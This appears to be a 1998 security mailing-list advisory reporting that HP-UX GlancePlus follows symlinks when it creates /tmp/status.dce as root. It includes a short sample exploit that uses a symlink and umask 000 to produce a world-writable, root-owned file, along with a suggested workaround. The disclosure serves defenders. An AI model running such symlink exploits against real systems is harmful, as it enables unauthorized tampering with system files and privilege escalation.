Date: Mon, 27 Apr 1998 23:31:12 +0200
From: "J.A. Gutierrez" <[email protected]>
To: [email protected]
Subject: HP-UX glance bug (#4?)
* Software:
HP-UX B.10.20 D
Glance.Runtime.GLANCE B.10.20.95 HP GlancePlus files
* Bug:
glance creates a /tmp/status.dce file as root, and it follows
symlinks, so you can append text like

    Pid: 16208 File: ndi_sm.c Line: 2609 Mon Apr 27 21:52:23 1998
    Performance Management Application registered.
    --------------------------------------------------------------------------

to any system file.
* Sample exploit:
$ umask 000
$ cd /tmp
$ ln -s /.test status.dce
$ glance -j 1 -iterations 1 -maxpages 1
$ ls -l /.test
-rw-rw-rw- 1 root bar 1080 Apr 27 23:06 /.test
# edit /.test to match your needs
* Workaround:
I guess creating a non-writable /tmp/status.dce file
and setting the t bit on /tmp (which it seems it has
not in the default HPUX installation) would be enough.
* Note: I've been looking for HP-UX bugs, and I have found
several reported holes in glance; but it seems this one
is new...
--
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)